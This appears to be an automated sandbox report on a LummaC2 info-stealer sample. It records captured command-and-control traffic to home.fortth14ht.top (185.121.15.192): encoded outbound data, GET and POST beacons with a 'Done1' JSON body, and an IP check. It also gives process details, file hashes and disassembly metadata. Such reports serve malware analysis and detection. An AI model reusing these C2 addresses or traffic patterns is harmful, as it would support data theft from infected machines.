Dec 27, 2024 15:07:52.171256065 CET	2472	OUT	Data Raw: 69 63 4d 2b 47 5c 2f 48 66 47 57 56 5a 33 6e 66 43 5c 2f 44 65 4f 7a 6e 4b 2b 48 4b 63 71 75 63 34 76 43 65 78 63 63 46 47 47 43 78 65 59 7a 54 70 31 4b 31 4f 74 58 71 51 79 5c 2f 4c 38 64 6a 70 30 73 4c 54 72 56 59 59 54 42 34 6e 45 53 67 71 56 Data Ascii: icM+G\/HfGWVZ3nfC\/DeOznK+HKcquc4vCexccFGGCxeYzTp1K1OtXqQy\/L8djp0sLTrVYYTB4nESgqVCpOOSrf38\/lz\/ACrpdC8XeJ\/DMiy6DrmpaYUkEoitrlxbNICCHktHL2srggENJCxB5GDXnY8SeHiGYa9opCFg5GqWOEK8sGPn4UqOWBxjvT4vEGhTq7wa1pEyR\/6x4tSs5FTjPzskxC8An5iOOele\/mGGyTO
Dec 27, 2024 15:07:52.290699005 CET	2472	OUT	Data Raw: 6d 72 32 57 6b 78 57 63 75 32 37 6e 74 66 76 4d 50 34 73 2b 48 2b 4a 6f 78 78 46 4c 69 5c 2f 4b 50 59 7a 78 75 42 79 2b 6a 4f 70 58 6e 51 57 4b 72 35 6e 55 71 55 63 74 6c 67 6c 58 6f 30 33 6a 73 4a 6a 36 6c 47 76 44 42 35 68 67 31 57 77 47 4a 65 Data Ascii: mr2WkxWcu27ntfvMP4s+H+JoxxFLi\/KPYzxuBy+jOpXnQWKr5nUqUctlglXo03jsJj6lGvDB5hg1WwGJeGxPscTNYav7P4nFeCvirg8RDC1+Bs9VeWWZhm86dKhTxDw2CynD0sVmn154erVjl+My7D18NWxuWY54fMsNDFYN1sJD63hvavorHbWoYfFQ8Hy3el3eqt8PPhb8TFbR9Qub+3j8O\/F74feFviX4ViuGutO02SLU4
Dec 27, 2024 15:07:52.290808916 CET	7416	OUT	Data Raw: 34 69 76 37 48 77 4a 64 4a 70 66 69 76 78 63 32 69 5c 2f 46 5c 2f 77 43 42 50 77 6a 6b 66 77 56 70 6e 69 4b 52 66 43 63 58 69 57 79 75 4c 79 79 31 62 78 56 62 36 31 6f 6d 69 5c 2f 32 6a 64 2b 46 66 46 71 36 46 5c 2f 59 57 47 38 56 5c 2f 44 33 47 Data Ascii: 4iv7HwJdJpfivxc2i\/F\/wCBPwjkfwVpniKRfCcXiWyuLyy1bxVb61omi\/2jd+FfFq6F\/YWG8V\/D3G4rLsFg+JsHi6+bYrB4HL\/qtDH4ijiMbj8vpZrg8J9apYSeFpYnEZZXp4+nRrVqdR4STruKpwnKP+bWI8FfFHL8HmuOzDhHHYHD5NhMdj8xWMxWW4XEYfA5ZjsVluPxkcFXx0MZiMNhswweJwdSvhqFan9YoypRk5
Dec 27, 2024 15:07:52.290939093 CET	4944	OUT	Data Raw: 44 72 45 76 68 76 78 44 4e 38 54 4e 46 74 62 44 54 74 59 30 33 35 57 2b 44 6e 37 57 74 7a 38 47 50 67 54 34 66 38 41 43 76 77 4b 38 59 2b 4f 66 68 52 38 55 76 43 5c 2f 5c 2f 42 4e 37 39 70 7a 34 4b 66 44 47 7a 66 77 78 34 30 6d 38 52 2b 41 5c 2f Data Ascii: DrEvhvxDN8TNFtbDTtY035W+Dn7Wtz8GPgT4f8ACvwK8Y+OfhR8UvC\/\/BN79pz4KfDGzfwx40m8R+A\/jD44\/wCCmyfHL4aeHbfxvZeHbqzsvF1h+zmtx4n034kaR4gTTvDeu2cAtPF2lfEODTrZPvq40PRLuRZrrR9KuZlxtluNPtJpFxjG15IWYYwMYPGB6VEfDnh4uJDoOimRRhXOl2JcDngN5GQOTwD3Pqa4uKfoa5Vx
Dec 27, 2024 15:07:55.897209883 CET	157	IN	HTTP/1.1 200 OK Server: nginx/1.22.1 Date: Fri, 27 Dec 2024 14:07:55 GMT Content-Type: text/html; charset=utf-8 Content-Length: 1 Connection: close Data Raw: 30 Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49736	185.121.15.192	80	7532	C:\Users\user\AppData\Local\Temp\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2024 15:07:56.170367956 CET	99	OUT	GET /nTrmoVgOaovBJpKSuLkP1735210003?argument=0 HTTP/1.1 Host: home.fortth14ht.top Accept: /
Dec 27, 2024 15:08:02.701571941 CET	372	IN	HTTP/1.1 404 NOT FOUND Server: nginx/1.22.1 Date: Fri, 27 Dec 2024 14:08:02 GMT Content-Type: text/html; charset=utf-8 Content-Length: 207 Connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49739	185.121.15.192	80	7532	C:\Users\user\AppData\Local\Temp\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2024 15:08:02.967519045 CET	172	OUT	POST /nTrmoVgOaovBJpKSuLkP1735210003 HTTP/1.1 Host: home.fortth14ht.top Accept: / Content-Type: application/json Content-Length: 31 Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "0", "data": "Done1" }
Dec 27, 2024 15:08:04.286046028 CET	212	IN	HTTP/1.0 503 Service Unavailable Cache-Control: no-cache Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	3.218.7.103	443	7532	C:\Users\user\AppData\Local\Temp\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-27 14:07:39 UTC	52	OUT	GET /ip HTTP/1.1 Host: httpbin.org Accept: /
2024-12-27 14:07:39 UTC	224	IN	HTTP/1.1 200 OK Date: Fri, 27 Dec 2024 14:07:39 GMT Content-Type: application/json Content-Length: 31 Connection: close Server: gunicorn/19.9.0 Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: true
2024-12-27 14:07:39 UTC	31	IN	Data Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a Data Ascii: { "origin": "8.46.123.189"}

Target ID:	0
Start time:	09:07:32
Start date:	27/12/2024
Path:	C:\Users\user\Desktop\E205fJJS1Q.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\E205fJJS1Q.exe"
Imagebase:	0xe10000
File size:	6'196'224 bytes
MD5 hash:	5B8011576B37D84DB9122786CDED9F55
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	09:07:35
Start date:	27/12/2024
Path:	C:\Users\user\AppData\Local\Temp\LummaC2.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\LummaC2.exe"
Imagebase:	0xee0000
File size:	299'520 bytes
MD5 hash:	607000C61FCB5A41B8D511B5ED7625D4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 55%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	09:07:35
Start date:	27/12/2024
Path:	C:\Users\user\AppData\Local\Temp\Set-up.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\Set-up.exe"
Imagebase:	0x870000
File size:	6'851'208 bytes
MD5 hash:	2A99036C44C996CEDEB2042D389FE23C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 26%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Function 059B0A08 Relevance: 1.4, Strings: 1, Instructions: 189COMMON

Download Yara Rule

Strings

8bq, xrefs: 059B0C4F

Memory Dump Source

Source File: 00000000.00000002.1717810884.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_59b0000_E205fJJS1Q.jbxd

Similarity

API ID:
String ID: 8bq
API String ID: 0-187764589
Opcode ID: d3c3998fbd638e0db9b398fa94bc9adc9fa2d32359cbfa4fcd493170446d11a3
Instruction ID: ac99f5831fbd4b3fa07e8e37587c32b793cfd2f3159b82d4641d5816c8d69121
Opcode Fuzzy Hash: d3c3998fbd638e0db9b398fa94bc9adc9fa2d32359cbfa4fcd493170446d11a3
Instruction Fuzzy Hash: 7461B0747042019FEB18EB79D18DB6ABBE7BB84304F59C469E50A97291DFB0EC01DB81

Function 059B0590 Relevance: .5, Instructions: 455COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1717810884.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_59b0000_E205fJJS1Q.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9025646ee3dc168938baaf48d0857b90cb89e9c4354ca1e269206f91a13e9659
Instruction ID: b6e2ec3b111a4b6cc55e11b4785f7abd9aa7e9693ad4cb69093f1bff90eebf97
Opcode Fuzzy Hash: 9025646ee3dc168938baaf48d0857b90cb89e9c4354ca1e269206f91a13e9659
Instruction Fuzzy Hash: 4D519E74A00349CFCB05DBB8E9946AEBFB3FF45304F148569D104AB390EB35694ADB91

Function 059B0C90 Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1717810884.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_59b0000_E205fJJS1Q.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed10b35a50d5c652be7b19ec6370a805a66aa5615f95d4ee37e5c74be566d424
Instruction ID: 01e8bb9fb1a1113605160b8edd358e617807bfb13e67b31714dd632849bc93db
Opcode Fuzzy Hash: ed10b35a50d5c652be7b19ec6370a805a66aa5615f95d4ee37e5c74be566d424
Instruction Fuzzy Hash: 53314535B006554FFB01D7AEDA889AFBBE9FBC4214B044066E409D7241DBB0FA05CBD1

Function 059B0848 Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1717810884.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_59b0000_E205fJJS1Q.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 854d7f19850a2fefe56d4cbe7a5c4d3470e03faf4000bda911eee1cacbeaedf1
Instruction ID: 6b89bd5dafe16d141b91659f1fae5777e21a4aef3b3d0093078178418caf9e62
Opcode Fuzzy Hash: 854d7f19850a2fefe56d4cbe7a5c4d3470e03faf4000bda911eee1cacbeaedf1
Instruction Fuzzy Hash: 7D411E74A00309CFCB05DFA8E5946AEBBB3FF45304F108568D504A7354EB35A94ADF91

Analysis Process: LummaC2.exePID: 7504, Parent PID: 7320COMMON

Execution Graph

Execution Coverage:	1.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	59.5%
Total number of Nodes:	42
Total number of Limit Nodes:	2

Executed Functions

Function 00F15135 Relevance: 65.4, Strings: 52, Instructions: 388
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

C, xrefs: 00F1540B
*, xrefs: 00F155E8
J, xrefs: 00F15148
:, xrefs: 00F151B8
9, xrefs: 00F1546D
H, xrefs: 00F15156
l, xrefs: 00F15355
8, xrefs: 00F151C6
V, xrefs: 00F15363
f, xrefs: 00F154CF
f, xrefs: 00F154C1
t, xrefs: 00F15451
6, xrefs: 00F15164
r, xrefs: 00F153E1
i, xrefs: 00F15371
3, xrefs: 00F15427
w, xrefs: 00F15443
(, xrefs: 00F15236
M, xrefs: 00F153C5
h, xrefs: 00F15489
4, xrefs: 00F156DA
R, xrefs: 00F1547B
., xrefs: 00F1520C
4, xrefs: 00F15172
F, xrefs: 00F156F8
", xrefs: 00F151F0
D, xrefs: 00F1545F
^, xrefs: 00F154A5
(, xrefs: 00F155F0
<, xrefs: 00F151AA
J, xrefs: 00F153EF
v, xrefs: 00F153A9
0, xrefs: 00F1518E
G, xrefs: 00F153FD
$, xrefs: 00F151E2
F, xrefs: 00F153D3
\, xrefs: 00F15497
>, xrefs: 00F1519C
2, xrefs: 00F15180
, xrefs: 00F154DD
, xrefs: 00F151FE
x, xrefs: 00F15419
M, xrefs: 00F15435
&, xrefs: 00F151D4
], xrefs: 00F15347
,, xrefs: 00F1521A
k, xrefs: 00F1532B
W, xrefs: 00F1537F
E, xrefs: 00F156F4
*, xrefs: 00F15228
n, xrefs: 00F154B3
{, xrefs: 00F1539B

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID:
String ID: $ $"$$$&$($($*$*$,$.$0$2$3$4$4$6$8$9$:$<$>$C$D$E$F$F$G$H$J$J$M$M$R$V$W$\$]$^$f$f$h$i$k$l$n$r$t$v$w$x${
API String ID: 0-1337114936
Opcode ID: 16674f85f6906008b508e607fc60044693bdb62d4931bbcd11e5788bfa4a3d32
Instruction ID: 83b775103cb1f60ceebbfbf764b5ae4f8f29224776725dca5821d0953072a6c6
Opcode Fuzzy Hash: 16674f85f6906008b508e607fc60044693bdb62d4931bbcd11e5788bfa4a3d32
Instruction Fuzzy Hash: 4B2261219087E9C9DB32C67C8C087CDBEA15B67324F0843D9D0E96B2D2D7750B86DB66

Function 00EE8720 Relevance: 7.7, APIs: 5, Instructions: 235
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 00EE8744
GetCurrentThreadId.KERNEL32 ref: 00EE874E
SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 00EE8808
GetForegroundWindow.USER32 ref: 00EE89A1
ExitProcess.KERNEL32 ref: 00EE8A17

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
String ID:
API String ID: 4063528623-0
Opcode ID: 929dcb054b4a6beedaba6dbf435fab86bc6b75a430f1cd6e8f4a7e3a4ffacd8a
Instruction ID: 9d65d6c4deebf5515b07eec1b9ad7fa0d83be4a8f1024bf5586edb2992f2cbce
Opcode Fuzzy Hash: 929dcb054b4a6beedaba6dbf435fab86bc6b75a430f1cd6e8f4a7e3a4ffacd8a
Instruction Fuzzy Hash: 36716A73E443188FD318EE6ADC4235AB6C79BC4714F1F813DA898EB395DE798C028695

Function 00F1BAD0 Relevance: 1.5, APIs: 1, Instructions: 14
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(00F1EA7B,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 00F1BAFE

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

Function 00F1C59C Relevance: 1.3, Strings: 1, Instructions: 70
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

9., xrefs: 00F1C5F0

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID: InitializeThunk
String ID: 9.
API String ID: 2994545307-3220845746
Opcode ID: f748692ec3d525dca78630c3b361f996d022d595d90c931c22158110b641f64d
Instruction ID: f530b3771d4f5053f40c6470c2e1ef18cd680998f0c11bfcdbb1ad462bcba021
Opcode Fuzzy Hash: f748692ec3d525dca78630c3b361f996d022d595d90c931c22158110b641f64d
Instruction Fuzzy Hash: 08112B31E402148BEB248F24DC547FA7BF1FB59334F29A618D855B72E1C7309C42AB80

Function 00F1EEC0 Relevance: .1, Instructions: 141
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d3220695498fd2a95fe88c58fa21e63aeea27d25331de12631e79938620bb90e
Instruction ID: f5570e42278f89592d29ef44d10fe4d877663ea2bf7e36874f3ec46986237419
Opcode Fuzzy Hash: d3220695498fd2a95fe88c58fa21e63aeea27d25331de12631e79938620bb90e
Instruction Fuzzy Hash: C3412971A05304DFE3248E25DCC1BB6B3A6EB8D768F24452CE9C697295CA31BC92E641

Function 00F1BC91 Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetForegroundWindow.USER32 ref: 00F1BCA2

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID: ForegroundWindow
String ID:
API String ID: 2020703349-0
Opcode ID: 5c614eecf5fc1aa40d951a2fa4a2859cbb274aea86febfc9dbd4c1d4ac7c1ab8
Instruction ID: a13c9275c2197d5e67d762e5946b79f04ea6d27e648030231d3023cd9e625aa2
Opcode Fuzzy Hash: 5c614eecf5fc1aa40d951a2fa4a2859cbb274aea86febfc9dbd4c1d4ac7c1ab8
Instruction Fuzzy Hash: 52E04FB5A0665D9FCB58DF68EC504B977B1EB583103044079E503C7761DB389503EB04

Function 00F1A080 Relevance: 1.5, APIs: 1, Instructions: 9
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(?,00000000,?,7B1647F3,00EE88F3,10130D9D), ref: 00F1A090

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: b8bc81024b10c217f36620a3333169e445e63a95df6203ca5d71cccfae72829d
Instruction ID: 2423b17c33f281877914a8123652afea6e95a145daea4be68e0716202d6a8510
Opcode Fuzzy Hash: b8bc81024b10c217f36620a3333169e445e63a95df6203ca5d71cccfae72829d
Instruction Fuzzy Hash: 0AC04831089121ABCA246B14EC09BCA3A69EF49360F160092B008660B58A60AC82AA94

Non-executed Functions

Function 00F1483C Relevance: 34.0, Strings: 27, Instructions: 298
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

3, xrefs: 00F1499E
j, xrefs: 00F1485D
), xrefs: 00F14946
`, xrefs: 00F148A3
0, xrefs: 00F14B4D
<, xrefs: 00F14992
t, xrefs: 00F1484F
b, xrefs: 00F14895
h, xrefs: 00F1486B
f, xrefs: 00F14A8C
O, xrefs: 00F14880
n, xrefs: 00F14879
], xrefs: 00F14A94
f, xrefs: 00F148B1
0, xrefs: 00F149A2
b, xrefs: 00F14A7C
>, xrefs: 00F14A43
2, xrefs: 00F1499A
d, xrefs: 00F148BF
l, xrefs: 00F14887
?, xrefs: 00F148F0
1, xrefs: 00F1491A
<, xrefs: 00F14A3A
>, xrefs: 00F1498A
:, xrefs: 00F1497A
_, xrefs: 00F14A84
8, xrefs: 00F14982

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID:
String ID: )$0$0$1$2$3$8$:$<$<$>$>$?$O$]$_$`$b$b$d$f$f$h$j$l$n$t
API String ID: 0-3467771618
Opcode ID: 8bef361d4e5a99ac4a072772bd6ab23b01023ef3b8c5da4e21e4c78b5453343c
Instruction ID: 61cabfa0eb0924f2536780a5c7d1191a72eb32fc9d52eec8199caf22d2dad07c
Opcode Fuzzy Hash: 8bef361d4e5a99ac4a072772bd6ab23b01023ef3b8c5da4e21e4c78b5453343c
Instruction Fuzzy Hash: 67E191219087E98EDB22CA7C88443CDBFB15B53324F1843D9D4E86B3D2D7754A86DB62

Function 00F16BF0 Relevance: 20.0, APIs: 10, Strings: 1, Instructions: 718memorycomCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00F2168C,00000000,00000001,00F2167C,00000000), ref: 00F16E11
SysAllocString.OLEAUT32(F5A3FBA8), ref: 00F16EDA
CoSetProxyBlanket.OLE32(D77F9D52,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00F16F18
SysAllocString.OLEAUT32(68DA6AD6), ref: 00F16F6D
SysAllocString.OLEAUT32(BD01C371), ref: 00F17025
VariantInit.OLEAUT32(F8FBFAF5), ref: 00F17097
SysFreeString.OLEAUT32(?), ref: 00F17382
SysFreeString.OLEAUT32(?), ref: 00F17388
SysFreeString.OLEAUT32(00000000), ref: 00F17399

Strings

\, xrefs: 00F16DCB

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID: String$AllocFree$BlanketCreateInitInstanceProxyVariant
String ID: \
API String ID: 2737081056-2967466578
Opcode ID: 74adf27d8b2188ba80cf5f9c5deacc154cf58327bbfd388b6c91bf6a99e7b4e0
Instruction ID: e5e3129acb72de4f1e92774ed741e29cb8921c515f6afd76641bf89cca41b204
Opcode Fuzzy Hash: 74adf27d8b2188ba80cf5f9c5deacc154cf58327bbfd388b6c91bf6a99e7b4e0
Instruction Fuzzy Hash: B7321071A483408FD318DF28C8907ABBBE1EFD5310F18892DE5DA9B291D774D846DB92

Function 00EEB14F Relevance: 15.5, Strings: 12, Instructions: 473COMMON

Download Yara Rule

Strings

.L~R, xrefs: 00EEB181
fPcV, xrefs: 00EEB188
DxY~, xrefs: 00EEB1E0
EtEz, xrefs: 00EEB1D6
9D,J, xrefs: 00EEB173
7, xrefs: 00EEB5E9
BpAv, xrefs: 00EEB1CC
